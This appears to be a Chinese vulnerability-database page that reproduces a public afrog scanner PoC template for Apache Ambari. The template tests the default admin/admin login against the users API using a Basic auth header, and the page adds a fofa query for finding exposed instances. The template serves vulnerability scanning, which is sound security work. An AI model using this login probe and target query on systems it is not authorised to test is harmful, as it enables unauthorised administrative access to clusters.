ambari-default-password: Apache Ambari Default Password

日期: 2025-08-01 | 影响软件: Apache Ambari | POC: 已公开

漏洞描述

An Apache Ambari default admin login was discovered. default password: admin/admin fofa: app="APACHE-Ambari"

PoC代码[已公开]

id: ambari-default-password

info:
  name: Apache Ambari Default Password
  author: wulalalaaa
  severity: high
  verified: true
  description: |-
    An Apache Ambari default admin login was discovered. default password: admin/admin
    fofa: app="APACHE-Ambari"
  reference:
    - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53833
  tags: ambari,default-login,apache
  created: 2023/06/24

rules:
  r0:
    request:
      method: GET
      path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
      headers:
        Authorization: Basic YWRtaW46YWRtaW4=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b"PrivilegeInfo") && 
      response.body.bcontains(b"AMBARI.")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/ambari-default-password.yaml

相关漏洞推荐